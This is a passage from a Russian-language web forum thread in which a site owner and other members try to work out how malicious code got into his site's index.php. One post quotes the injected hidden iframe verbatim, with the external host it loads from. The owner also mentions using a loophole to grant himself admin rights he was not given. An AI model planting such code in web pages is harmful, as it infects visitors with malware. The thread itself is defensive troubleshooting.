|
Автор |
Сообщение |
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
Да, я честно говоря не раз жалел, что мы связались с "Кельник-студиос". И не удивительно, что нашего сайта у них в портфолио нет. У них на витрине одно, а в реальности несколько другое. Во-первых, они делали его больше года! Во-вторых, делали его по-видимому, весьма неопытные дизайнеры и программисты. Я так подозреваю, что у них есть 1-2 действительно стоящих, но они заняты только на очень дорогих проектах. А работать с ними было одно мучение. Когда я им говорил, что надо сделать ещё это, то они отвечали: "С какой стати? Мы об этом не договаривались." Приходилось указывать строку в договоре, где сказано, что договаривались. Потом они дня по 3 убеждали нас, что делать этого не надо, что и так хорошо, когда сделать это можно было за 2 часа. Потом после убедительных просьб, давлений или откровенных угроз всё-таки делали. И так в течение года. |
|
Вернуться к началу |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
Никаких строк типа: "Powered by PunBB" или "Сайт работает на UMI.CMS" я тоже нигде не нашёл, ни в админке ни в файлах. Возможно, это их собственная разработка. |
|
Вернуться к началу |
|
|
Tuxik
Тяпницо
Зарегистрирован: 02.07.2007 Сообщения: 1521
|
|
|
|
Значит, скорее всего, вас "подсадили на иглу", чтобы вы обращаться в Кельник-студиос за технической поддержкой...
Или искать профессионала, который разберется в их работе. |
|
Вернуться к началу |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
Tuxik, не знаю насчёт подсаживания. Мы уже больше года сами справляемся. В общем, там система администрирования вполне работоспособная, к тому-же я нашёл лазейку и присвоил себе права администратора, которых по началу мне не дали. |
|
Вернуться к началу |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
Меня интересует вообще-то, возможно ли проникновение вирусов кроме варианты кражи пароля? Если такие варианты существуют, то как этому противодействовать? |
|
Вернуться к началу |
|
|
den
Старожил
Зарегистрирован: 31.01.2006 Сообщения: 13870 Откуда: Кировоград, Украина
|
|
|
|
sql-инъекция, когда код вируса заносится в бд, а потом выводится вместе с другой инфой... |
|
Вернуться к началу |
dhsilabs@jabber.ru |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
И он попадает в файлы *.php? |
|
Вернуться к началу |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
А каков механизм его попадания в БД? |
|
Вернуться к началу |
|
|
den
Старожил
Зарегистрирован: 31.01.2006 Сообщения: 13870 Откуда: Кировоград, Украина
|
|
|
|
В PHP-файлы обычно попадают вирусы путем кражи паролей. Часть вируса крадет пароль и внедряет в ПХП-файл вторую часть вируса |
|
Вернуться к началу |
dhsilabs@jabber.ru |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
А вирус откуда? С компьютера администратора сайта? |
|
Вернуться к началу |
|
|
yok
Участник тусовки
Зарегистрирован: 06.02.2008 Сообщения: 260 Откуда: krasnodar
|
|
|
|
Думаю, надо локализовать причину возникновения этой строки
<ifrme src="http://kораеvа.sеrvеgаmе.соm:8О8О/ts/in.cgi?ореn6" width=821 height=0 style="visibility: hidden">
Значит что за файлы в которых она присутствует?
Как они создавались, генерировались, из базы данных взяты ли элементы, из какого сценария?
Сервер университета тоже исключать думаю не стоит из области видимости причины.
А если дата остальных 2008, то понимаю что они статические. Значит чтобы модифицировать их необходимо право на запись. Что за права у файлов. Искать причину изменения прав. |
|
Вернуться к началу |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
В первую очередь, это был файл index.php и ещё 3 файла в системе администрирования. Они статические. С первого из них, как я понимаю и начинается открытие главной страницы сайта, это аналог index.html в статических сайтах. А насчёт прав, при доступе по ftp их конечно же можно стирать, записывать и соответственно модифицировать. |
|
Вернуться к началу |
|
|
Anton99
Neo
Зарегистрирован: 26.11.2006 Сообщения: 1676
|
|
|
|
не читал всю тему, но, чтобы определить движок сайта, можно использовать плагин Wappalyzer для Firefox. |
|
Вернуться к началу |
|
|
yok
Участник тусовки
Зарегистрирован: 06.02.2008 Сообщения: 260 Откуда: krasnodar
|
|
|
|
Значит на индексном файле есть вывод злополучного фрейма. Если дата создания не меняется, значит как вариант, - он подкачивает какойто блок, происхождение которого необходимо выяснить. Возможно он генерируется каким либо сценарием и вот тут понабобиться знание кода. |
|
Вернуться к началу |
|
|
|
|